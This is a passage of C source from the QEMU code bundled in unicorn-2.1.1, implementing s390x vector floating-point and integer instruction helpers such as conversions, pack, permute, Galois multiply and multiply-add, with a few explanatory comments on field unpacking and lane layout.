erm, vcdlg64, GETPC()); } void HELPER(gvec_vcdlg64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vcdlg64, GETPC()); } static uint64_t vcgd64(uint64_t a, float_status *s) { return float64_to_int64(a, s); } void HELPER(gvec_vcgd64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); 
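/*
 * The translator packed these fields with deposit32(m4, 4, 4, erm) (see
 * op_vcdg in the translation code), and every conversion helper unpacks
 * them the same way:
 *
 *   uint8_t erm = extract32(simd_data(desc), 4, 4); // rounding mode, bits 4..7
 *   bool    XxC = extract32(simd_data(desc), 2, 1); // suppress inexact traps
 */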
vop64_2(v1, v2, env, false, XxC, erm, vcgd64, GETPC()); } void HELPER(gvec_vcgd64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vcgd64, GETPC()); } static uint64_t vclgd64(uint64_t a, float_status *s) { return float64_to_uint64(a, s); } void HELPER(gvec_vclgd64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vclgd64, GETPC()); } void HELPER(gvec_vclgd64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vclgd64, GETPC()); } static uint64_t vfd64(uint64_t a, uint64_t b, float_status *s) { return float64_div(a, b, s); } void HELPER(gvec_vfd64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfd64, GETPC()); } void HELPER(gvec_vfd64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfd64, GETPC()); } static uint64_t vfi64(uint64_t a, float_status *s) { return float64_round_to_int(a, s); } void HELPER(gvec_vfi64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vfi64, GETPC()); } void HELPER(gvec_vfi64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vfi64, GETPC()); } static void vfll32(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i; for (i = 0; i < 2; i++) { /* load from even element */ const float32 a = s390_vec_read_element32(v2, i * 2); const uint64_t ret = float32_to_float64(a, &env->fpu_status); s390_vec_write_element64(&tmp, i, ret); /* indicate the source element */ vxc = check_ieee_exc(env, i * 2, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } void HELPER(gvec_vfll32)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vfll32(v1, v2, env, false, GETPC()); } void HELPER(gvec_vfll32s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vfll32(v1, v2, env, true, GETPC()); } static void vflr64(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, bool XxC, uint8_t erm, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i, old_mode; old_mode = s390_swap_bfp_rounding_mode(env, erm); for (i = 0; i < 2; i++) { float64 a = s390_vec_read_element64(v2, i); uint32_t ret = float64_to_float32(a, &env->fpu_status); /* place at even element */ s390_vec_write_element32(&tmp, i * 2, ret); /* indicate the source element */ vxc = check_ieee_exc(env, i, XxC, &vec_exc); if (s || vxc) { break; } } s390_restore_bfp_rounding_mode(env, old_mode); handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } void HELPER(gvec_vflr64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vflr64(v1, 
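/*
 * VFLL/VFLR touch only the even-numbered narrow lanes: vfll32() above
 * reads float32 elements 0 and 2 and widens them, while vflr64() writes
 * its narrowed results back to elements 0 and 2. Plain-C sketch of the
 * widening direction:
 *
 *   static void fll32(double dst[2], const float src[4])
 *   {
 *       dst[0] = (double)src[0]; // even source elements only
 *       dst[1] = (double)src[2];
 *   }
 */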
v2, env, false, XxC, erm, GETPC()); } void HELPER(gvec_vflr64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vflr64(v1, v2, env, true, XxC, erm, GETPC()); } static uint64_t vfm64(uint64_t a, uint64_t b, float_status *s) { return float64_mul(a, b, s); } void HELPER(gvec_vfm64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfm64, GETPC()); } void HELPER(gvec_vfm64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfm64, GETPC()); } static void vfma64(S390Vector *v1, const S390Vector *v2, const S390Vector *v3, const S390Vector *v4, CPUS390XState *env, bool s, int flags, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i; for (i = 0; i < 2; i++) { const uint64_t a = s390_vec_read_element64(v2, i); const uint64_t b = s390_vec_read_element64(v3, i); const uint64_t c = s390_vec_read_element64(v4, i); uint64_t ret = float64_muladd(a, b, c, flags, &env->fpu_status); s390_vec_write_element64(&tmp, i, ret); vxc = check_ieee_exc(env, i, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } void HELPER(gvec_vfma64)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, false, 0, GETPC()); } void HELPER(gvec_vfma64s)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, true, 0, GETPC()); } void HELPER(gvec_vfms64)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, false, float_muladd_negate_c, GETPC()); } void HELPER(gvec_vfms64s)(void *v1, const void *v2, const void *v3, const void *v4, CPUS390XState *env, uint32_t desc) { vfma64(v1, v2, v3, v4, env, true, float_muladd_negate_c, GETPC()); } static uint64_t vfsq64(uint64_t a, float_status *s) { return float64_sqrt(a, s); } void HELPER(gvec_vfsq64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vop64_2(v1, v2, env, false, false, 0, vfsq64, GETPC()); } void HELPER(gvec_vfsq64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { vop64_2(v1, v2, env, true, false, 0, vfsq64, GETPC()); } static uint64_t vfs64(uint64_t a, uint64_t b, float_status *s) { return float64_sub(a, b, s); } void HELPER(gvec_vfs64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfs64, GETPC()); } void HELPER(gvec_vfs64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfs64, GETPC()); } static int vftci64(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, uint16_t i3) { int i, match = 0; for (i = 0; i < 2; i++) { float64 a = s390_vec_read_element64(v2, i); if (float64_dcmask(env, a) & i3) { match++; s390_vec_write_element64(v1, i, -1ull); } else { s390_vec_write_element64(v1, i, 0); } if (s) { break; } } if (match) { return s || match == 2 ? 
0 : 1; } return 3; } void HELPER(gvec_vftci64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = vftci64(v1, v2, env, false, simd_data(desc)); } void HELPER(gvec_vftci64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = vftci64(v1, v2, env, true, simd_data(desc)); } unicorn-2.1.1/qemu/target/s390x/vec_helper.c /* * QEMU TCG support -- s390x vector support instructions * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "vec.h" #include "tcg/tcg.h" #include "tcg/tcg-gvec-desc.h" #include "exec/helper-proto.h" #include "exec/cpu_ldst.h" #include "exec/exec-all.h" void HELPER(vll)(CPUS390XState *env, void *v1, uint64_t addr, uint64_t bytes) { if (likely(bytes >= 16)) { uint64_t t0, t1; t0 = cpu_ldq_data_ra(env, addr, GETPC()); addr = wrap_address(env, addr + 8); t1 = cpu_ldq_data_ra(env, addr, GETPC()); s390_vec_write_element64(v1, 0, t0); s390_vec_write_element64(v1, 1, t1); } else { S390Vector tmp = { 0 }; int i; for (i = 0; i < bytes; i++) { uint8_t byte = cpu_ldub_data_ra(env, addr, GETPC()); s390_vec_write_element8(&tmp, i, byte); addr = wrap_address(env, addr + 1); } *(S390Vector *)v1 = tmp; } } #define DEF_VPK_HFN(BITS, TBITS) \ typedef uint##TBITS##_t (*vpk##BITS##_fn)(uint##BITS##_t, int *); \ static int vpk##BITS##_hfn(S390Vector *v1, const S390Vector *v2, \ const S390Vector *v3, vpk##BITS##_fn fn) \ { \ int i, saturated = 0; \ S390Vector tmp; \ \ for (i = 0; i < (128 / TBITS); i++) { \ uint##BITS##_t src; \ \ if (i < (128 / BITS)) { \ src = s390_vec_read_element##BITS(v2, i); \ } else { \ src = s390_vec_read_element##BITS(v3, i - (128 / BITS)); \ } \ s390_vec_write_element##TBITS(&tmp, i, fn(src, &saturated)); \ } \ *v1 = tmp; \ return saturated; \ } DEF_VPK_HFN(64, 32) DEF_VPK_HFN(32, 16) DEF_VPK_HFN(16, 8) #define DEF_VPK(BITS, TBITS) \ static uint##TBITS##_t vpk##BITS##e(uint##BITS##_t src, int *saturated) \ { \ return src; \ } \ void HELPER(gvec_vpk##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ vpk##BITS##_hfn(v1, v2, v3, vpk##BITS##e); \ } DEF_VPK(64, 32) DEF_VPK(32, 16) DEF_VPK(16, 8) #define DEF_VPKS(BITS, TBITS) \ static uint##TBITS##_t vpks##BITS##e(uint##BITS##_t src, int *saturated) \ { \ if ((int##BITS##_t)src > INT##TBITS##_MAX) { \ (*saturated)++; \ return INT##TBITS##_MAX; \ } else if ((int##BITS##_t)src < INT##TBITS##_MIN) { \ (*saturated)++; \ return INT##TBITS##_MIN; \ } \ return src; \ } \ void HELPER(gvec_vpks##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ vpk##BITS##_hfn(v1, v2, v3, vpks##BITS##e); \ } \ void HELPER(gvec_vpks_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ int saturated = vpk##BITS##_hfn(v1, v2, v3,
vpks##BITS##e); \ \ if (saturated == (128 / TBITS)) { \ env->cc_op = 3; \ } else if (saturated) { \ env->cc_op = 1; \ } else { \ env->cc_op = 0; \ } \ } DEF_VPKS(64, 32) DEF_VPKS(32, 16) DEF_VPKS(16, 8) #define DEF_VPKLS(BITS, TBITS) \ static uint##TBITS##_t vpkls##BITS##e(uint##BITS##_t src, int *saturated) \ { \ if (src > UINT##TBITS##_MAX) { \ (*saturated)++; \ return UINT##TBITS##_MAX; \ } \ return src; \ } \ void HELPER(gvec_vpkls##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ vpk##BITS##_hfn(v1, v2, v3, vpkls##BITS##e); \ } \ void HELPER(gvec_vpkls_cc##BITS)(void *v1, const void *v2, const void *v3, \ CPUS390XState *env, uint32_t desc) \ { \ int saturated = vpk##BITS##_hfn(v1, v2, v3, vpkls##BITS##e); \ \ if (saturated == (128 / TBITS)) { \ env->cc_op = 3; \ } else if (saturated) { \ env->cc_op = 1; \ } else { \ env->cc_op = 0; \ } \ } DEF_VPKLS(64, 32) DEF_VPKLS(32, 16) DEF_VPKLS(16, 8) void HELPER(gvec_vperm)(void *v1, const void *v2, const void *v3, const void *v4, uint32_t desc) { S390Vector tmp; int i; for (i = 0; i < 16; i++) { const uint8_t selector = s390_vec_read_element8(v4, i) & 0x1f; uint8_t byte; if (selector < 16) { byte = s390_vec_read_element8(v2, selector); } else { byte = s390_vec_read_element8(v3, selector - 16); } s390_vec_write_element8(&tmp, i, byte); } *(S390Vector *)v1 = tmp; } void HELPER(vstl)(CPUS390XState *env, const void *v1, uint64_t addr, uint64_t bytes) { /* Probe write access before actually modifying memory */ probe_write_access(env, addr, bytes, GETPC()); if (likely(bytes >= 16)) { cpu_stq_data_ra(env, addr, s390_vec_read_element64(v1, 0), GETPC()); addr = wrap_address(env, addr + 8); cpu_stq_data_ra(env, addr, s390_vec_read_element64(v1, 1), GETPC()); } else { int i; for (i = 0; i < bytes; i++) { uint8_t byte = s390_vec_read_element8(v1, i); cpu_stb_data_ra(env, addr, byte, GETPC()); addr = wrap_address(env, addr + 1); } } } unicorn-2.1.1/qemu/target/s390x/vec_int_helper.c /* * QEMU TCG support -- s390x vector integer instruction support * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory.
*/ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "vec.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" static bool s390_vec_is_zero(const S390Vector *v) { return !v->doubleword[0] && !v->doubleword[1]; } static void s390_vec_xor(S390Vector *res, const S390Vector *a, const S390Vector *b) { res->doubleword[0] = a->doubleword[0] ^ b->doubleword[0]; res->doubleword[1] = a->doubleword[1] ^ b->doubleword[1]; } static void s390_vec_and(S390Vector *res, const S390Vector *a, const S390Vector *b) { res->doubleword[0] = a->doubleword[0] & b->doubleword[0]; res->doubleword[1] = a->doubleword[1] & b->doubleword[1]; } static bool s390_vec_equal(const S390Vector *a, const S390Vector *b) { return a->doubleword[0] == b->doubleword[0] && a->doubleword[1] == b->doubleword[1]; } static void s390_vec_shl(S390Vector *d, const S390Vector *a, uint64_t count) { uint64_t tmp; g_assert(count < 128); if (count == 0) { d->doubleword[0] = a->doubleword[0]; d->doubleword[1] = a->doubleword[1]; } else if (count == 64) { d->doubleword[0] = a->doubleword[1]; d->doubleword[1] = 0; } else if (count < 64) { tmp = extract64(a->doubleword[1], 64 - count, count); d->doubleword[1] = a->doubleword[1] << count; d->doubleword[0] = (a->doubleword[0] << count) | tmp; } else { d->doubleword[0] = a->doubleword[1] << (count - 64); d->doubleword[1] = 0; } } static void s390_vec_sar(S390Vector *d, const S390Vector *a, uint64_t count) { uint64_t tmp; if (count == 0) { d->doubleword[0] = a->doubleword[0]; d->doubleword[1] = a->doubleword[1]; } else if (count == 64) { tmp = (int64_t)a->doubleword[0] >> 63; d->doubleword[1] = a->doubleword[0]; d->doubleword[0] = tmp; } else if (count < 64) { tmp = a->doubleword[1] >> count; d->doubleword[1] = deposit64(tmp, 64 - count, count, a->doubleword[0]); d->doubleword[0] = (int64_t)a->doubleword[0] >> count; } else { tmp = (int64_t)a->doubleword[0] >> 63; d->doubleword[1] = (int64_t)a->doubleword[0] >> (count - 64); d->doubleword[0] = tmp; } } static void s390_vec_shr(S390Vector *d, const S390Vector *a, uint64_t count) { uint64_t tmp; g_assert(count < 128); if (count == 0) { d->doubleword[0] = a->doubleword[0]; d->doubleword[1] = a->doubleword[1]; } else if (count == 64) { d->doubleword[1] = a->doubleword[0]; d->doubleword[0] = 0; } else if (count < 64) { tmp = a->doubleword[1] >> count; d->doubleword[1] = deposit64(tmp, 64 - count, count, a->doubleword[0]); d->doubleword[0] = a->doubleword[0] >> count; } else { d->doubleword[1] = a->doubleword[0] >> (count - 64); d->doubleword[0] = 0; } } #define DEF_VAVG(BITS) \ void HELPER(gvec_vavg##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const int32_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, i); \ const int32_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a + b + 1) >> 1); \ } \ } DEF_VAVG(8) DEF_VAVG(16) #define DEF_VAVGL(BITS) \ void HELPER(gvec_vavgl##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a + b + 1) >> 1); \ } \ } DEF_VAVGL(8) DEF_VAVGL(16) #define DEF_VCLZ(BITS) \ void HELPER(gvec_vclz##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = 
s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, clz32(a) - 32 + BITS); \ } \ } DEF_VCLZ(8) DEF_VCLZ(16) #define DEF_VCTZ(BITS) \ void HELPER(gvec_vctz##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, a ? ctz32(a) : BITS); \ } \ } DEF_VCTZ(8) DEF_VCTZ(16) /* like binary multiplication, but XOR instead of addition */ #define DEF_GALOIS_MULTIPLY(BITS, TBITS) \ static uint##TBITS##_t galois_multiply##BITS(uint##TBITS##_t a, \ uint##TBITS##_t b) \ { \ uint##TBITS##_t res = 0; \ \ while (b) { \ if (b & 0x1) { \ res = res ^ a; \ } \ a = a << 1; \ b = b >> 1; \ } \ return res; \ } DEF_GALOIS_MULTIPLY(8, 16) DEF_GALOIS_MULTIPLY(16, 32) DEF_GALOIS_MULTIPLY(32, 64) static S390Vector galois_multiply64(uint64_t a, uint64_t b) { S390Vector res = { 0 }; S390Vector va = { .doubleword[1] = a, }; S390Vector vb = { .doubleword[1] = b, }; while (!s390_vec_is_zero(&vb)) { if (vb.doubleword[1] & 0x1) { s390_vec_xor(&res, &res, &va); } s390_vec_shl(&va, &va, 1); s390_vec_shr(&vb, &vb, 1); } return res; } #define DEF_VGFM(BITS, TBITS) \ void HELPER(gvec_vgfm##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / TBITS); i++) { \ uint##BITS##_t a = s390_vec_read_element##BITS(v2, i * 2); \ uint##BITS##_t b = s390_vec_read_element##BITS(v3, i * 2); \ uint##TBITS##_t d = galois_multiply##BITS(a, b); \ \ a = s390_vec_read_element##BITS(v2, i * 2 + 1); \ b = s390_vec_read_element##BITS(v3, i * 2 + 1); \ d = d ^ galois_multiply32(a, b); \ s390_vec_write_element##TBITS(v1, i, d); \ } \ } DEF_VGFM(8, 16) DEF_VGFM(16, 32) DEF_VGFM(32, 64) void HELPER(gvec_vgfm64)(void *v1, const void *v2, const void *v3, uint32_t desc) { S390Vector tmp1, tmp2; uint64_t a, b; a = s390_vec_read_element64(v2, 0); b = s390_vec_read_element64(v3, 0); tmp1 = galois_multiply64(a, b); a = s390_vec_read_element64(v2, 1); b = s390_vec_read_element64(v3, 1); tmp2 = galois_multiply64(a, b); s390_vec_xor(v1, &tmp1, &tmp2); } #define DEF_VGFMA(BITS, TBITS) \ void HELPER(gvec_vgfma##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / TBITS); i++) { \ uint##BITS##_t a = s390_vec_read_element##BITS(v2, i * 2); \ uint##BITS##_t b = s390_vec_read_element##BITS(v3, i * 2); \ uint##TBITS##_t d = galois_multiply##BITS(a, b); \ \ a = s390_vec_read_element##BITS(v2, i * 2 + 1); \ b = s390_vec_read_element##BITS(v3, i * 2 + 1); \ d = d ^ galois_multiply32(a, b); \ d = d ^ s390_vec_read_element##TBITS(v4, i); \ s390_vec_write_element##TBITS(v1, i, d); \ } \ } DEF_VGFMA(8, 16) DEF_VGFMA(16, 32) DEF_VGFMA(32, 64) void HELPER(gvec_vgfma64)(void *v1, const void *v2, const void *v3, const void *v4, uint32_t desc) { S390Vector tmp1, tmp2; uint64_t a, b; a = s390_vec_read_element64(v2, 0); b = s390_vec_read_element64(v3, 0); tmp1 = galois_multiply64(a, b); a = s390_vec_read_element64(v2, 1); b = s390_vec_read_element64(v3, 1); tmp2 = galois_multiply64(a, b); s390_vec_xor(&tmp1, &tmp1, &tmp2); s390_vec_xor(v1, &tmp1, v4); } #define DEF_VMAL(BITS) \ void HELPER(gvec_vmal##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ const uint##BITS##_t c = 
s390_vec_read_element##BITS(v4, i); \ \ s390_vec_write_element##BITS(v1, i, a * b + c); \ } \ } DEF_VMAL(8) DEF_VMAL(16) #define DEF_VMAH(BITS) \ void HELPER(gvec_vmah##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const int32_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, i); \ const int32_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, i); \ const int32_t c = (int##BITS##_t)s390_vec_read_element##BITS(v4, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b + c) >> BITS); \ } \ } DEF_VMAH(8) DEF_VMAH(16) #define DEF_VMALH(BITS) \ void HELPER(gvec_vmalh##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ const uint##BITS##_t c = s390_vec_read_element##BITS(v4, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b + c) >> BITS); \ } \ } DEF_VMALH(8) DEF_VMALH(16) #define DEF_VMAE(BITS, TBITS) \ void HELPER(gvec_vmae##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ int##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMAE(8, 16) DEF_VMAE(16, 32) DEF_VMAE(32, 64) #define DEF_VMALE(BITS, TBITS) \ void HELPER(gvec_vmale##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ uint##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMALE(8, 16) DEF_VMALE(16, 32) DEF_VMALE(32, 64) #define DEF_VMAO(BITS, TBITS) \ void HELPER(gvec_vmao##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ int##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMAO(8, 16) DEF_VMAO(16, 32) DEF_VMAO(32, 64) #define DEF_VMALO(BITS, TBITS) \ void HELPER(gvec_vmalo##BITS)(void *v1, const void *v2, const void *v3, \ const void *v4, uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ uint##TBITS##_t c = s390_vec_read_element##TBITS(v4, i); \ \ s390_vec_write_element##TBITS(v1, i, a * b + c); \ } \ } DEF_VMALO(8, 16) DEF_VMALO(16, 32) DEF_VMALO(32, 64) #define DEF_VMH(BITS) \ void HELPER(gvec_vmh##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const int32_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, i); \ const int32_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b) >> BITS); \ } \ } DEF_VMH(8) DEF_VMH(16) #define DEF_VMLH(BITS) \ void 
HELPER(gvec_vmlh##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, (a * b) >> BITS); \ } \ } DEF_VMLH(8) DEF_VMLH(16) #define DEF_VME(BITS, TBITS) \ void HELPER(gvec_vme##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VME(8, 16) DEF_VME(16, 32) DEF_VME(32, 64) #define DEF_VMLE(BITS, TBITS) \ void HELPER(gvec_vmle##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 0; i < (128 / TBITS); i++, j += 2) { \ const uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ const uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VMLE(8, 16) DEF_VMLE(16, 32) DEF_VMLE(32, 64) #define DEF_VMO(BITS, TBITS) \ void HELPER(gvec_vmo##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ int##TBITS##_t a = (int##BITS##_t)s390_vec_read_element##BITS(v2, j); \ int##TBITS##_t b = (int##BITS##_t)s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VMO(8, 16) DEF_VMO(16, 32) DEF_VMO(32, 64) #define DEF_VMLO(BITS, TBITS) \ void HELPER(gvec_vmlo##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i, j; \ \ for (i = 0, j = 1; i < (128 / TBITS); i++, j += 2) { \ const uint##TBITS##_t a = s390_vec_read_element##BITS(v2, j); \ const uint##TBITS##_t b = s390_vec_read_element##BITS(v3, j); \ \ s390_vec_write_element##TBITS(v1, i, a * b); \ } \ } DEF_VMLO(8, 16) DEF_VMLO(16, 32) DEF_VMLO(32, 64) #define DEF_VPOPCT(BITS) \ void HELPER(gvec_vpopct##BITS)(void *v1, const void *v2, uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, ctpop32(a)); \ } \ } DEF_VPOPCT(8) DEF_VPOPCT(16) #define DEF_VERLLV(BITS) \ void HELPER(gvec_verllv##BITS)(void *v1, const void *v2, const void *v3, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ const uint##BITS##_t b = s390_vec_read_element##BITS(v3, i); \ \ s390_vec_write_element##BITS(v1, i, rol##BITS(a, b)); \ } \ } DEF_VERLLV(8) DEF_VERLLV(16) #define DEF_VERLL(BITS) \ void HELPER(gvec_verll##BITS)(void *v1, const void *v2, uint64_t count, \ uint32_t desc) \ { \ int i; \ \ for (i = 0; i < (128 / BITS); i++) { \ const uint##BITS##_t a = s390_vec_read_element##BITS(v2, i); \ \ s390_vec_write_element##BITS(v1, i, rol##BITS(a, count)); \ } \ } DEF_VERLL(8) DEF_VERLL(16) #define DEF_VERIM(BITS) \ void 